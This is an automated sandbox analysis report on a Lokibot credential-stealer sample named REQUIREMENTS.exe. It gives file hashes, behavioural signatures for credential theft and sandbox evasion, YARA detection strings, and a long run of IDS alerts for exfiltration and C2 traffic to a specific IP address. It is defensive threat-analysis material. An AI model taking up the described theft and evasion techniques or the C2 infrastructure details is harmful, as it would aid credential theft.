Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report REQUIREMENTS.exe

Overview

General Information

Sample Name:REQUIREMENTS.exe
Analysis ID:326330
MD5:70109889c622058fd38e3b14965ca813
SHA1:c8dbd06cca04210f0be50e741b299d27b3f7a4c2
SHA256:cfb1834c33817d2fb697bd75004827c5d888e6f62e5db56d2381014e58290821
Tags:exeLoki

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM_3
Yara detected Lokibot
Yara detected Lokibot
.NET source code contains very large strings
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w10x64
  • REQUIREMENTS.exe (PID: 4324 cmdline: 'C:\Users\user\Desktop\REQUIREMENTS.exe' MD5: 70109889C622058FD38E3B14965CA813)
    • REQUIREMENTS.exe (PID: 5344 cmdline: C:\Users\user\Desktop\REQUIREMENTS.exe MD5: 70109889C622058FD38E3B14965CA813)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmpLoki_1Loki Payloadkevoreilly
          • 0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
          • 0x153fc:$a2: last_compatible_version
          00000001.00000002.504516698.0000000000400000.00000040.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
          • 0x13bff:$des3: 68 03 66 00 00
          • 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
          • 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
          Click to see the 19 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.REQUIREMENTS.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.2.REQUIREMENTS.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              1.2.REQUIREMENTS.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                1.2.REQUIREMENTS.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                1.2.REQUIREMENTS.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                • 0x12fff:$des3: 68 03 66 00 00
                • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                Click to see the 5 entries

                Sigma Overview

                No Sigma rule has matched

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Machine Learning detection for sampleShow sources
                Source: REQUIREMENTS.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\REQUIREMENTS.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49720 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49720 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49720 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49720 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49720 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49721 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49721 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49721 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49721 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49721 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49722 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49722 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49722 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49722 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49722 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49723 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49723 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49723 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49723 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49723 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49724 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49724 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49724 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49724 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49724 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49725 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49725 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49725 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49725 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49725 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49726 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49726 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49726 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49726 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49726 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49727 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49727 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49727 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49727 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49727 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49728 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49728 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49728 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49728 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49728 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49729 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49729 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49729 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49729 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49729 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49730 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49730 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49730 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49731 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49731 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49731 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49732 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49732 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49732 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49734 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49735 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49736 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49737 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49739 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49740 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49740 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49740 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49741 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49741 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49741 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49741 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49741 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49742 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49742 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49742 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49742 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49742 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49743 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49745 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49746 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49747 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49747 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49747 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49748 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49749 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49750 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49751 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49752 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49753 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49754 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49754 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49754 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49755 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49756 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49756 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49756 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49756 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49756 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49757 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49757 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49758 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49758 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49758 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49758 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49758 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49759 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2570 WEB-MISC Invalid HTTP Version String 192.168.2.5:49760 -> 45.134.225.18:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49760 -> 45.134.225.18:80
